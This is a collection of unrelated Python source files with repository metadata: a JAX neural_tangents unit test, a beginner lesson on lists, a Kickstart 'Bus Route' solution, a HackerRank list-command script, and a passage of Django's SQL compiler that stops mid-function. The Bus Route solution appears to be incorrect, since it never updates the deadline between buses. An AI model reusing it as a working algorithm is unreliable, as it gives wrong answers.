79a47a60b5dd00d03c5ae5f9edb44ca66463fc1c
|
refs/heads/master
| 2022-12-27T03:48:29.453417 | 2020-09-30T17:21:22 | 2020-10-01T00:44:19 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,958 |
py
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for `utils/predict.py`."""
from absl.testing import absltest
from jax import test_util as jtu
from jax.api import device_get
from jax.api import jit
from jax.config import config
from jax.lib import xla_bridge
import jax.numpy as np
import jax.random as random
from neural_tangents.utils import utils
config.parse_flags_with_absl()
config.update('jax_numpy_rank_promotion', 'raise')
class UtilsTest(jtu.JaxTestCase):
def testIsOnCPU(self):
for dtype in [np.float32, np.float64]:
with self.subTest(dtype=dtype):
def x():
return random.normal(random.PRNGKey(1), (2, 3), dtype)
def x_cpu():
return device_get(random.normal(random.PRNGKey(1), (2, 3), dtype))
x_jit = jit(x)
# x_cpu_jit = jit(x_cpu)
x_cpu_jit_cpu = jit(x_cpu, backend='cpu')
self.assertTrue(utils.is_on_cpu(x_cpu()))
# TODO(mattjj): re-enable this when device_put under jit works
# self.assertTrue(utils.is_on_cpu(x_cpu_jit()))
self.assertTrue(utils.is_on_cpu(x_cpu_jit_cpu()))
if xla_bridge.get_backend().platform == 'cpu':
self.assertTrue(utils.is_on_cpu(x()))
self.assertTrue(utils.is_on_cpu(x_jit()))
else:
self.assertFalse(utils.is_on_cpu(x()))
self.assertFalse(utils.is_on_cpu(x_jit()))
if __name__ == '__main__':
absltest.main()
|
[
"[email protected]"
] | |
8b0bcb3eb0687fab864e824994d9b70939870f5d
|
5bcee9248d0bdebb134c61b4d0a3f3113337a569
|
/lesson_0902/01_lists.py
|
816ff09874e0073dca2b2f3d1f0fd9d842bcbb7b
|
[] |
no_license
|
100ballovby/6V_Lesson
|
c2edbc652ea2ebec07eeed60060c16ae4b4792e4
|
4b6dfda323a628558bd63bd5569960004fc335dd
|
refs/heads/master
| 2023-05-08T07:49:14.569854 | 2021-05-25T06:40:53 | 2021-05-25T06:40:53 | 330,888,686 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,044 |
py
|
'''
A list is an ordered data structure enclosed in square brackets.
Its elements are separated by commas.
To create a list, give it a name, add the assignment sign (=)
and open square brackets.
список = [1, 26, 15, 5.6, 'привет, Андрей']
'''
cars = ['audi', 'mercedes', 'toyota', 'skoda', 'seat']
# print the whole list
print(cars)
# print only the Toyota from the list
print(cars[2])
print(cars[-1])  # print the last element of the list
import random  # the random module produces randomness
print('My first car was', cars[random.randint(0, 4)])
# randint(a, b) - return a random integer
# in the range from a to b
print(random.randint(-100, 100))
|
[
"[email protected]"
] | |
fa4c4bebb84eeea7871eaf044e4ec0be599f769c
|
3d9506b859cdbf38a21549cd3d64b69ecde7674e
|
/GoogleCodeJam/2020KickstartRoundB/BusRoute.py
|
b7cceed2c849cd5b217cc8829a02467223137486
|
[] |
no_license
|
bradykim7/Algorithm
|
1ae4c6e4e6d72687b660ddf0768a9174cc8d7b8c
|
053210a1205f4e62b367f85b65dcb60fcad74008
|
refs/heads/master
| 2022-06-25T04:46:55.265058 | 2022-06-17T08:08:52 | 2022-06-17T08:08:52 | 233,500,101 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 349 |
py
|
import sys;
if __name__=='__main__':
t = int(input());
for i in range(t):
nd = input().split();
n=int(nd[0]); d=int(nd[1]);
ans =d;
x= list(map(int,input().rstrip().split()));
for j in x:
ans -= d % j
print('Case #%d: %d'%(i+1,ans))
|
[
"[email protected]"
] | |
5d842f89dca376141a6a97ff7ced4635dd7d4015
|
82aa64e423bcd2d2ae77a58552417bee0e2e3c9a
|
/Python/Basic Data Types/Lists.py
|
a42ace84b7ade4cfccefe4845b940184473c576a
|
[] |
no_license
|
abhi1362/HackerRank
|
7cdbb8a2fadd42e749fc5a7ce8635c2c303a9057
|
95dcd35ba554023c3d74c6e6574a1fbedc5e7845
|
refs/heads/master
| 2021-12-29T19:54:52.750399 | 2018-01-28T07:06:00 | 2018-01-28T07:06:00 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,014 |
py
|
if __name__ == '__main__':
N = int(input())
array_list = []
def print_():
print(array_list)
def sort():
array_list.sort()
def pop():
array_list.pop()
def insert():
array_list.insert(index,value)
def append():
array_list.append(value)
def reverse():
array_list.reverse()
def remove():
array_list.remove(value)
for i in range(0,N):
user_command = input()
command = user_command.split()
com = command[0]
if len(command) >= 2:
value = int(command[1])
index = value
if len(command)>=3:
value = int(command[2])
index = int(command[1])
commands ={
"insert":insert,
"remove":remove,
"pop":pop,
"reverse":reverse,
"append":append,
"insert":insert,
"sort":sort,
"print":print_,
}
commands[com]()
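# --- Example stdin for the dispatch table above (format inferred from the
# --- parsing code: "<command> [arg1] [arg2]", one line each after the count N):
#   4
#   insert 0 5
#   append 9
#   sort
#   print
# This builds [5, 9] and the final "print" command outputs [5, 9].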
|
[
"[email protected]"
] | |
b103132e0bee93fd37295128ccea5a1e416e708e
|
3cdb4faf34d8375d6aee08bcc523adadcb0c46e2
|
/web/env/lib/python3.6/site-packages/django/db/models/sql/compiler.py
|
27b8cc343b29121d30713bacbde5e9dfc595aef5
|
[
"MIT",
"GPL-3.0-only"
] |
permissive
|
rizwansoaib/face-attendence
|
bc185d4de627ce5adab1cda7da466cb7a5fddcbe
|
59300441b52d32f3ecb5095085ef9d448aef63af
|
refs/heads/master
| 2020-04-25T23:47:47.303642 | 2019-09-12T14:26:17 | 2019-09-12T14:26:17 | 173,157,284 | 45 | 12 |
MIT
| 2020-02-11T23:47:55 | 2019-02-28T17:33:14 |
Python
|
UTF-8
|
Python
| false | false | 67,037 |
py
|
import collections
import functools
import re
import warnings
from itertools import chain
from django.core.exceptions import EmptyResultSet, FieldError
from django.db.models.constants import LOOKUP_SEP
from django.db.models.expressions import OrderBy, Random, RawSQL, Ref
from django.db.models.query_utils import QueryWrapper, select_related_descend
from django.db.models.sql.constants import (
CURSOR, GET_ITERATOR_CHUNK_SIZE, MULTI, NO_RESULTS, ORDER_DIR, SINGLE,
)
from django.db.models.sql.query import Query, get_order_dir
from django.db.transaction import TransactionManagementError
from django.db.utils import DatabaseError, NotSupportedError
from django.utils.deprecation import RemovedInDjango30Warning
from django.utils.inspect import func_supports_parameter
FORCE = object()
class SQLCompiler:
def __init__(self, query, connection, using):
self.query = query
self.connection = connection
self.using = using
self.quote_cache = {'*': '*'}
# The select, klass_info, and annotations are needed by QuerySet.iterator()
# these are set as a side-effect of executing the query. Note that we calculate
# separately a list of extra select columns needed for grammatical correctness
# of the query, but these columns are not included in self.select.
self.select = None
self.annotation_col_map = None
self.klass_info = None
self.ordering_parts = re.compile(r'(.*)\s(ASC|DESC)(.*)')
def setup_query(self):
if all(self.query.alias_refcount[a] == 0 for a in self.query.alias_map):
self.query.get_initial_alias()
self.select, self.klass_info, self.annotation_col_map = self.get_select()
self.col_count = len(self.select)
def pre_sql_setup(self):
"""
Do any necessary class setup immediately prior to producing SQL. This
is for things that can't necessarily be done in __init__ because we
might not have all the pieces in place at that time.
"""
self.setup_query()
order_by = self.get_order_by()
self.where, self.having = self.query.where.split_having()
extra_select = self.get_extra_select(order_by, self.select)
self.has_extra_select = bool(extra_select)
group_by = self.get_group_by(self.select + extra_select, order_by)
return extra_select, order_by, group_by
def get_group_by(self, select, order_by):
"""
Return a list of 2-tuples of form (sql, params).
The logic of what exactly the GROUP BY clause contains is hard
to describe in other words than "if it passes the test suite,
then it is correct".
"""
# Some examples:
# SomeModel.objects.annotate(Count('somecol'))
# GROUP BY: all fields of the model
#
# SomeModel.objects.values('name').annotate(Count('somecol'))
# GROUP BY: name
#
# SomeModel.objects.annotate(Count('somecol')).values('name')
# GROUP BY: all cols of the model
#
# SomeModel.objects.values('name', 'pk').annotate(Count('somecol')).values('pk')
# GROUP BY: name, pk
#
# SomeModel.objects.values('name').annotate(Count('somecol')).values('pk')
# GROUP BY: name, pk
#
# In fact, the self.query.group_by is the minimal set to GROUP BY. It
# can't be ever restricted to a smaller set, but additional columns in
# HAVING, ORDER BY, and SELECT clauses are added to it. Unfortunately
# the end result is that it is impossible to force the query to have
# a chosen GROUP BY clause - you can almost do this by using the form:
# .values(*wanted_cols).annotate(AnAggregate())
# but any later annotations, extra selects, values calls that
# refer some column outside of the wanted_cols, order_by, or even
# filter calls can alter the GROUP BY clause.
# The query.group_by is either None (no GROUP BY at all), True
# (group by select fields), or a list of expressions to be added
# to the group by.
if self.query.group_by is None:
return []
expressions = []
if self.query.group_by is not True:
# If the group by is set to a list (by .values() call most likely),
# then we need to add everything in it to the GROUP BY clause.
# Backwards compatibility hack for setting query.group_by. Remove
# when we have public API way of forcing the GROUP BY clause.
# Converts string references to expressions.
for expr in self.query.group_by:
if not hasattr(expr, 'as_sql'):
expressions.append(self.query.resolve_ref(expr))
else:
expressions.append(expr)
# Note that even if the group_by is set, it is only the minimal
# set to group by. So, we need to add cols in select, order_by, and
# having into the select in any case.
for expr, _, _ in select:
cols = expr.get_group_by_cols()
for col in cols:
expressions.append(col)
for expr, (sql, params, is_ref) in order_by:
# Skip References to the select clause, as all expressions in the
# select clause are already part of the group by.
if not expr.contains_aggregate and not is_ref:
expressions.extend(expr.get_source_expressions())
having_group_by = self.having.get_group_by_cols() if self.having else ()
for expr in having_group_by:
expressions.append(expr)
result = []
seen = set()
expressions = self.collapse_group_by(expressions, having_group_by)
for expr in expressions:
sql, params = self.compile(expr)
if (sql, tuple(params)) not in seen:
result.append((sql, params))
seen.add((sql, tuple(params)))
return result
def collapse_group_by(self, expressions, having):
# If the DB can group by primary key, then group by the primary key of
# query's main model. Note that for PostgreSQL the GROUP BY clause must
# include the primary key of every table, but for MySQL it is enough to
# have the main table's primary key.
if self.connection.features.allows_group_by_pk:
# Determine if the main model's primary key is in the query.
pk = None
for expr in expressions:
# Is this a reference to query's base table primary key? If the
# expression isn't a Col-like, then skip the expression.
if (getattr(expr, 'target', None) == self.query.model._meta.pk and
getattr(expr, 'alias', None) == self.query.base_table):
pk = expr
break
# If the main model's primary key is in the query, group by that
# field, HAVING expressions, and expressions associated with tables
# that don't have a primary key included in the grouped columns.
if pk:
pk_aliases = {
expr.alias for expr in expressions
if hasattr(expr, 'target') and expr.target.primary_key
}
expressions = [pk] + [
expr for expr in expressions
if expr in having or (
getattr(expr, 'alias', None) is not None and expr.alias not in pk_aliases
)
]
elif self.connection.features.allows_group_by_selected_pks:
# Filter out all expressions associated with a table's primary key
# present in the grouped columns. This is done by identifying all
# tables that have their primary key included in the grouped
# columns and removing non-primary key columns referring to them.
# Unmanaged models are excluded because they could be representing
# database views on which the optimization might not be allowed.
pks = {
expr for expr in expressions
if hasattr(expr, 'target') and expr.target.primary_key and expr.target.model._meta.managed
}
aliases = {expr.alias for expr in pks}
expressions = [
expr for expr in expressions if expr in pks or getattr(expr, 'alias', None) not in aliases
]
return expressions
def get_select(self):
"""
Return three values:
- a list of 3-tuples of (expression, (sql, params), alias)
- a klass_info structure,
- a dictionary of annotations
The (sql, params) is what the expression will produce, and alias is the
"AS alias" for the column (possibly None).
The klass_info structure contains the following information:
- The base model of the query.
- Which columns for that model are present in the query (by
position of the select clause).
- related_klass_infos: [f, klass_info] to descent into
The annotations is a dictionary of {'attname': column position} values.
"""
select = []
klass_info = None
annotations = {}
select_idx = 0
for alias, (sql, params) in self.query.extra_select.items():
annotations[alias] = select_idx
select.append((RawSQL(sql, params), alias))
select_idx += 1
assert not (self.query.select and self.query.default_cols)
if self.query.default_cols:
cols = self.get_default_columns()
else:
# self.query.select is a special case. These columns never go to
# any model.
cols = self.query.select
if cols:
select_list = []
for col in cols:
select_list.append(select_idx)
select.append((col, None))
select_idx += 1
klass_info = {
'model': self.query.model,
'select_fields': select_list,
}
for alias, annotation in self.query.annotation_select.items():
annotations[alias] = select_idx
select.append((annotation, alias))
select_idx += 1
if self.query.select_related:
related_klass_infos = self.get_related_selections(select)
klass_info['related_klass_infos'] = related_klass_infos
def get_select_from_parent(klass_info):
for ki in klass_info['related_klass_infos']:
if ki['from_parent']:
ki['select_fields'] = (klass_info['select_fields'] +
ki['select_fields'])
get_select_from_parent(ki)
get_select_from_parent(klass_info)
ret = []
for col, alias in select:
try:
sql, params = self.compile(col, select_format=True)
except EmptyResultSet:
# Select a predicate that's always False.
sql, params = '0', ()
ret.append((col, (sql, params), alias))
return ret, klass_info, annotations
def get_order_by(self):
"""
Return a list of 2-tuples of form (expr, (sql, params, is_ref)) for the
ORDER BY clause.
The order_by clause can alter the select clause (for example it
can add aliases to clauses that do not yet have one, or it can
add totally new select clauses).
"""
if self.query.extra_order_by:
ordering = self.query.extra_order_by
elif not self.query.default_ordering:
ordering = self.query.order_by
else:
ordering = (self.query.order_by or self.query.get_meta().ordering or [])
if self.query.standard_ordering:
asc, desc = ORDER_DIR['ASC']
else:
asc, desc = ORDER_DIR['DESC']
order_by = []
for field in ordering:
if hasattr(field, 'resolve_expression'):
if not isinstance(field, OrderBy):
field = field.asc()
if not self.query.standard_ordering:
field.reverse_ordering()
order_by.append((field, False))
continue
if field == '?': # random
order_by.append((OrderBy(Random()), False))
continue
col, order = get_order_dir(field, asc)
descending = order == 'DESC'
if col in self.query.annotation_select:
# Reference to expression in SELECT clause
order_by.append((
OrderBy(Ref(col, self.query.annotation_select[col]), descending=descending),
True))
continue
if col in self.query.annotations:
# References to an expression which is masked out of the SELECT clause
order_by.append((
OrderBy(self.query.annotations[col], descending=descending),
False))
continue
if '.' in field:
# This came in through an extra(order_by=...) addition. Pass it
# on verbatim.
table, col = col.split('.', 1)
order_by.append((
OrderBy(
RawSQL('%s.%s' % (self.quote_name_unless_alias(table), col), []),
descending=descending
), False))
continue
if not self.query._extra or col not in self.query._extra:
# 'col' is of the form 'field' or 'field1__field2' or
# '-field1__field2__field', etc.
order_by.extend(self.find_ordering_name(
field, self.query.get_meta(), default_order=asc))
else:
if col not in self.query.extra_select:
order_by.append((
OrderBy(RawSQL(*self.query.extra[col]), descending=descending),
False))
else:
order_by.append((
OrderBy(Ref(col, RawSQL(*self.query.extra[col])), descending=descending),
True))
result = []
seen = set()
for expr, is_ref in order_by:
if self.query.combinator:
src = expr.get_source_expressions()[0]
# Relabel order by columns to raw numbers if this is a combined
# query; necessary since the columns can't be referenced by the
# fully qualified name and the simple column names may collide.
for idx, (sel_expr, _, col_alias) in enumerate(self.select):
if is_ref and col_alias == src.refs:
src = src.source
elif col_alias:
continue
if src == sel_expr:
expr.set_source_expressions([RawSQL('%d' % (idx + 1), ())])
break
else:
raise DatabaseError('ORDER BY term does not match any column in the result set.')
resolved = expr.resolve_expression(
self.query, allow_joins=True, reuse=None)
sql, params = self.compile(resolved)
# Don't add the same column twice, but the order direction is
# not taken into account so we strip it. When this entire method
# is refactored into expressions, then we can check each part as we
# generate it.
without_ordering = self.ordering_parts.search(sql).group(1)
if (without_ordering, tuple(params)) in seen:
continue
seen.add((without_ordering, tuple(params)))
result.append((resolved, (sql, params, is_ref)))
return result
def get_extra_select(self, order_by, select):
extra_select = []
if self.query.distinct and not self.query.distinct_fields:
select_sql = [t[1] for t in select]
for expr, (sql, params, is_ref) in order_by:
without_ordering = self.ordering_parts.search(sql).group(1)
if not is_ref and (without_ordering, params) not in select_sql:
extra_select.append((expr, (without_ordering, params), None))
return extra_select
def quote_name_unless_alias(self, name):
"""
A wrapper around connection.ops.quote_name that doesn't quote aliases
for table names. This avoids problems with some SQL dialects that treat
quoted strings specially (e.g. PostgreSQL).
"""
if name in self.quote_cache:
return self.quote_cache[name]
if ((name in self.query.alias_map and name not in self.query.table_map) or
name in self.query.extra_select or (
name in self.query.external_aliases and name not in self.query.table_map)):
self.quote_cache[name] = name
return name
r = self.connection.ops.quote_name(name)
self.quote_cache[name] = r
return r
def compile(self, node, select_format=False):
vendor_impl = getattr(node, 'as_' + self.connection.vendor, None)
if vendor_impl:
sql, params = vendor_impl(self, self.connection)
else:
sql, params = node.as_sql(self, self.connection)
if select_format is FORCE or (select_format and not self.query.subquery):
return node.output_field.select_format(self, sql, params)
return sql, params
def get_combinator_sql(self, combinator, all):
features = self.connection.features
compilers = [
query.get_compiler(self.using, self.connection)
for query in self.query.combined_queries if not query.is_empty()
]
if not features.supports_slicing_ordering_in_compound:
for query, compiler in zip(self.query.combined_queries, compilers):
if query.low_mark or query.high_mark:
raise DatabaseError('LIMIT/OFFSET not allowed in subqueries of compound statements.')
if compiler.get_order_by():
raise DatabaseError('ORDER BY not allowed in subqueries of compound statements.')
parts = ()
for compiler in compilers:
try:
# If the columns list is limited, then all combined queries
# must have the same columns list. Set the selects defined on
# the query on all combined queries, if not already set.
if not compiler.query.values_select and self.query.values_select:
compiler.query.set_values((
*self.query.extra_select,
*self.query.values_select,
*self.query.annotation_select,
))
parts += (compiler.as_sql(),)
except EmptyResultSet:
# Omit the empty queryset with UNION and with DIFFERENCE if the
# first queryset is nonempty.
if combinator == 'union' or (combinator == 'difference' and parts):
continue
raise
if not parts:
raise EmptyResultSet
combinator_sql = self.connection.ops.set_operators[combinator]
if all and combinator == 'union':
combinator_sql += ' ALL'
braces = '({})' if features.supports_slicing_ordering_in_compound else '{}'
sql_parts, args_parts = zip(*((braces.format(sql), args) for sql, args in parts))
result = [' {} '.format(combinator_sql).join(sql_parts)]
params = []
for part in args_parts:
params.extend(part)
return result, params
def as_sql(self, with_limits=True, with_col_aliases=False):
"""
Create the SQL for this query. Return the SQL string and list of
parameters.
If 'with_limits' is False, any limit/offset information is not included
in the query.
"""
refcounts_before = self.query.alias_refcount.copy()
try:
extra_select, order_by, group_by = self.pre_sql_setup()
for_update_part = None
# Is a LIMIT/OFFSET clause needed?
with_limit_offset = with_limits and (self.query.high_mark is not None or self.query.low_mark)
combinator = self.query.combinator
features = self.connection.features
if combinator:
if not getattr(features, 'supports_select_{}'.format(combinator)):
raise NotSupportedError('{} is not supported on this database backend.'.format(combinator))
result, params = self.get_combinator_sql(combinator, self.query.combinator_all)
else:
distinct_fields, distinct_params = self.get_distinct()
# This must come after 'select', 'ordering', and 'distinct'
# (see docstring of get_from_clause() for details).
from_, f_params = self.get_from_clause()
where, w_params = self.compile(self.where) if self.where is not None else ("", [])
having, h_params = self.compile(self.having) if self.having is not None else ("", [])
result = ['SELECT']
params = []
if self.query.distinct:
distinct_result, distinct_params = self.connection.ops.distinct_sql(
distinct_fields,
distinct_params,
)
result += distinct_result
params += distinct_params
out_cols = []
col_idx = 1
for _, (s_sql, s_params), alias in self.select + extra_select:
if alias:
s_sql = '%s AS %s' % (s_sql, self.connection.ops.quote_name(alias))
elif with_col_aliases:
s_sql = '%s AS %s' % (s_sql, 'Col%d' % col_idx)
col_idx += 1
params.extend(s_params)
out_cols.append(s_sql)
result += [', '.join(out_cols), 'FROM', *from_]
params.extend(f_params)
if self.query.select_for_update and self.connection.features.has_select_for_update:
if self.connection.get_autocommit():
raise TransactionManagementError('select_for_update cannot be used outside of a transaction.')
if with_limit_offset and not self.connection.features.supports_select_for_update_with_limit:
raise NotSupportedError(
'LIMIT/OFFSET is not supported with '
'select_for_update on this database backend.'
)
nowait = self.query.select_for_update_nowait
skip_locked = self.query.select_for_update_skip_locked
of = self.query.select_for_update_of
# If it's a NOWAIT/SKIP LOCKED/OF query but the backend
# doesn't support it, raise NotSupportedError to prevent a
# possible deadlock.
if nowait and not self.connection.features.has_select_for_update_nowait:
raise NotSupportedError('NOWAIT is not supported on this database backend.')
elif skip_locked and not self.connection.features.has_select_for_update_skip_locked:
raise NotSupportedError('SKIP LOCKED is not supported on this database backend.')
elif of and not self.connection.features.has_select_for_update_of:
raise NotSupportedError('FOR UPDATE OF is not supported on this database backend.')
for_update_part = self.connection.ops.for_update_sql(
nowait=nowait,
skip_locked=skip_locked,
of=self.get_select_for_update_of_arguments(),
)
if for_update_part and self.connection.features.for_update_after_from:
result.append(for_update_part)
if where:
result.append('WHERE %s' % where)
params.extend(w_params)
grouping = []
for g_sql, g_params in group_by:
grouping.append(g_sql)
params.extend(g_params)
if grouping:
if distinct_fields:
raise NotImplementedError('annotate() + distinct(fields) is not implemented.')
order_by = order_by or self.connection.ops.force_no_ordering()
result.append('GROUP BY %s' % ', '.join(grouping))
if having:
result.append('HAVING %s' % having)
params.extend(h_params)
if self.query.explain_query:
result.insert(0, self.connection.ops.explain_query_prefix(
self.query.explain_format,
**self.query.explain_options
))
if order_by:
ordering = []
for _, (o_sql, o_params, _) in order_by:
ordering.append(o_sql)
params.extend(o_params)
result.append('ORDER BY %s' % ', '.join(ordering))
if with_limit_offset:
result.append(self.connection.ops.limit_offset_sql(self.query.low_mark, self.query.high_mark))
if for_update_part and not self.connection.features.for_update_after_from:
result.append(for_update_part)
if self.query.subquery and extra_select:
# If the query is used as a subquery, the extra selects would
# result in more columns than the left-hand side expression is
# expecting. This can happen when a subquery uses a combination
# of order_by() and distinct(), forcing the ordering expressions
# to be selected as well. Wrap the query in another subquery
# to exclude extraneous selects.
sub_selects = []
sub_params = []
for index, (select, _, alias) in enumerate(self.select, start=1):
if not alias and with_col_aliases:
alias = 'col%d' % index
if alias:
sub_selects.append("%s.%s" % (
self.connection.ops.quote_name('subquery'),
self.connection.ops.quote_name(alias),
))
else:
select_clone = select.relabeled_clone({select.alias: 'subquery'})
subselect, subparams = select_clone.as_sql(self, self.connection)
sub_selects.append(subselect)
sub_params.extend(subparams)
return 'SELECT %s FROM (%s) subquery' % (
', '.join(sub_selects),
' '.join(result),
), tuple(sub_params + params)
return ' '.join(result), tuple(params)
finally:
# Finally do cleanup - get rid of the joins we created above.
self.query.reset_refcounts(refcounts_before)
def get_default_columns(self, start_alias=None, opts=None, from_parent=None):
"""
Compute the default columns for selecting every field in the base
model. Will sometimes be called to pull in related models (e.g. via
select_related), in which case "opts" and "start_alias" will be given
to provide a starting point for the traversal.
Return a list of strings, quoted appropriately for use in SQL
directly, as well as a set of aliases used in the select statement (if
'as_pairs' is True, return a list of (alias, col_name) pairs instead
of strings as the first component and None as the second component).
"""
result = []
if opts is None:
opts = self.query.get_meta()
only_load = self.deferred_to_columns()
start_alias = start_alias or self.query.get_initial_alias()
# The 'seen_models' is used to optimize checking the needed parent
# alias for a given field. This also includes None -> start_alias to
# be used by local fields.
seen_models = {None: start_alias}
for field in opts.concrete_fields:
model = field.model._meta.concrete_model
# A proxy model will have a different model and concrete_model. We
# will assign None if the field belongs to this model.
if model == opts.model:
model = None
if from_parent and model is not None and issubclass(
from_parent._meta.concrete_model, model._meta.concrete_model):
# Avoid loading data for already loaded parents.
# We end up here in the case select_related() resolution
# proceeds from parent model to child model. In that case the
# parent model data is already present in the SELECT clause,
# and we want to avoid reloading the same data again.
continue
if field.model in only_load and field.attname not in only_load[field.model]:
continue
alias = self.query.join_parent_model(opts, model, start_alias,
seen_models)
column = field.get_col(alias)
result.append(column)
return result
def get_distinct(self):
"""
Return a quoted list of fields to use in DISTINCT ON part of the query.
This method can alter the tables in the query, and thus it must be
called before get_from_clause().
"""
result = []
params = []
opts = self.query.get_meta()
for name in self.query.distinct_fields:
parts = name.split(LOOKUP_SEP)
_, targets, alias, joins, path, _, transform_function = self._setup_joins(parts, opts, None)
targets, alias, _ = self.query.trim_joins(targets, joins, path)
for target in targets:
if name in self.query.annotation_select:
result.append(name)
else:
r, p = self.compile(transform_function(target, alias))
result.append(r)
params.append(p)
return result, params
def find_ordering_name(self, name, opts, alias=None, default_order='ASC',
already_seen=None):
"""
Return the table alias (the name might be ambiguous, the alias will
not be) and column name for ordering by the given 'name' parameter.
The 'name' is of the form 'field1__field2__...__fieldN'.
"""
name, order = get_order_dir(name, default_order)
descending = order == 'DESC'
pieces = name.split(LOOKUP_SEP)
field, targets, alias, joins, path, opts, transform_function = self._setup_joins(pieces, opts, alias)
# If we get to this point and the field is a relation to another model,
# append the default ordering for that model unless the attribute name
# of the field is specified.
if field.is_relation and opts.ordering and getattr(field, 'attname', None) != name:
# Firstly, avoid infinite loops.
already_seen = already_seen or set()
join_tuple = tuple(getattr(self.query.alias_map[j], 'join_cols', None) for j in joins)
if join_tuple in already_seen:
raise FieldError('Infinite loop caused by ordering.')
already_seen.add(join_tuple)
results = []
for item in opts.ordering:
results.extend(self.find_ordering_name(item, opts, alias,
order, already_seen))
return results
targets, alias, _ = self.query.trim_joins(targets, joins, path)
return [(OrderBy(transform_function(t, alias), descending=descending), False) for t in targets]
def _setup_joins(self, pieces, opts, alias):
"""
Helper method for get_order_by() and get_distinct().
get_ordering() and get_distinct() must produce same target columns on
same input, as the prefixes of get_ordering() and get_distinct() must
match. Executing SQL where this is not true is an error.
"""
alias = alias or self.query.get_initial_alias()
field, targets, opts, joins, path, transform_function = self.query.setup_joins(pieces, opts, alias)
alias = joins[-1]
return field, targets, alias, joins, path, opts, transform_function
def get_from_clause(self):
"""
Return a list of strings that are joined together to go after the
"FROM" part of the query, as well as a list any extra parameters that
need to be included. Subclasses, can override this to create a
from-clause via a "select".
This should only be called after any SQL construction methods that
might change the tables that are needed. This means the select columns,
ordering, and distinct must be done first.
"""
result = []
params = []
for alias in tuple(self.query.alias_map):
if not self.query.alias_refcount[alias]:
continue
try:
from_clause = self.query.alias_map[alias]
except KeyError:
# Extra tables can end up in self.tables, but not in the
# alias_map if they aren't in a join. That's OK. We skip them.
continue
clause_sql, clause_params = self.compile(from_clause)
result.append(clause_sql)
params.extend(clause_params)
for t in self.query.extra_tables:
alias, _ = self.query.table_alias(t)
# Only add the alias if it's not already present (the table_alias()
# call increments the refcount, so an alias refcount of one means
# this is the only reference).
if alias not in self.query.alias_map or self.query.alias_refcount[alias] == 1:
result.append(', %s' % self.quote_name_unless_alias(alias))
return result, params
def get_related_selections(self, select, opts=None, root_alias=None, cur_depth=1,
requested=None, restricted=None):
"""
Fill in the information needed for a select_related query. The current
depth is measured as the number of connections away from the root model
(for example, cur_depth=1 means we are looking at models with direct
connections to the root model).
"""
def _get_field_choices():
direct_choices = (f.name for f in opts.fields if f.is_relation)
reverse_choices = (
f.field.related_query_name()
for f in opts.related_objects if f.field.unique
)
return chain(direct_choices, reverse_choices, self.query._filtered_relations)
related_klass_infos = []
if not restricted and cur_depth > self.query.max_depth:
# We've recursed far enough; bail out.
return related_klass_infos
if not opts:
opts = self.query.get_meta()
root_alias = self.query.get_initial_alias()
only_load = self.query.get_loaded_field_names()
# Setup for the case when only particular related fields should be
# included in the related selection.
fields_found = set()
if requested is None:
restricted = isinstance(self.query.select_related, dict)
if restricted:
requested = self.query.select_related
def get_related_klass_infos(klass_info, related_klass_infos):
klass_info['related_klass_infos'] = related_klass_infos
for f in opts.fields:
field_model = f.model._meta.concrete_model
fields_found.add(f.name)
if restricted:
next = requested.get(f.name, {})
if not f.is_relation:
# If a non-related field is used like a relation,
# or if a single non-relational field is given.
if next or f.name in requested:
raise FieldError(
"Non-relational field given in select_related: '%s'. "
"Choices are: %s" % (
f.name,
", ".join(_get_field_choices()) or '(none)',
)
)
else:
next = False
if not select_related_descend(f, restricted, requested,
only_load.get(field_model)):
continue
klass_info = {
'model': f.remote_field.model,
'field': f,
'reverse': False,
'local_setter': f.set_cached_value,
'remote_setter': f.remote_field.set_cached_value if f.unique else lambda x, y: None,
'from_parent': False,
}
related_klass_infos.append(klass_info)
select_fields = []
_, _, _, joins, _, _ = self.query.setup_joins(
[f.name], opts, root_alias)
alias = joins[-1]
columns = self.get_default_columns(start_alias=alias, opts=f.remote_field.model._meta)
for col in columns:
select_fields.append(len(select))
select.append((col, None))
klass_info['select_fields'] = select_fields
next_klass_infos = self.get_related_selections(
select, f.remote_field.model._meta, alias, cur_depth + 1, next, restricted)
get_related_klass_infos(klass_info, next_klass_infos)
if restricted:
related_fields = [
(o.field, o.related_model)
for o in opts.related_objects
if o.field.unique and not o.many_to_many
]
for f, model in related_fields:
if not select_related_descend(f, restricted, requested,
only_load.get(model), reverse=True):
continue
related_field_name = f.related_query_name()
fields_found.add(related_field_name)
join_info = self.query.setup_joins([related_field_name], opts, root_alias)
alias = join_info.joins[-1]
from_parent = issubclass(model, opts.model) and model is not opts.model
klass_info = {
'model': model,
'field': f,
'reverse': True,
'local_setter': f.remote_field.set_cached_value,
'remote_setter': f.set_cached_value,
'from_parent': from_parent,
}
related_klass_infos.append(klass_info)
select_fields = []
columns = self.get_default_columns(
start_alias=alias, opts=model._meta, from_parent=opts.model)
for col in columns:
select_fields.append(len(select))
select.append((col, None))
klass_info['select_fields'] = select_fields
next = requested.get(f.related_query_name(), {})
next_klass_infos = self.get_related_selections(
select, model._meta, alias, cur_depth + 1,
next, restricted)
get_related_klass_infos(klass_info, next_klass_infos)
fields_not_found = set(requested).difference(fields_found)
for name in list(requested):
# Filtered relations work only on the topmost level.
if cur_depth > 1:
break
if name in self.query._filtered_relations:
fields_found.add(name)
f, _, join_opts, joins, _, _ = self.query.setup_joins([name], opts, root_alias)
model = join_opts.model
alias = joins[-1]
from_parent = issubclass(model, opts.model) and model is not opts.model
def local_setter(obj, from_obj):
f.remote_field.set_cached_value(from_obj, obj)
def remote_setter(obj, from_obj):
setattr(from_obj, name, obj)
klass_info = {
'model': model,
'field': f,
'reverse': True,
'local_setter': local_setter,
'remote_setter': remote_setter,
'from_parent': from_parent,
}
related_klass_infos.append(klass_info)
select_fields = []
columns = self.get_default_columns(
start_alias=alias, opts=model._meta,
from_parent=opts.model,
)
for col in columns:
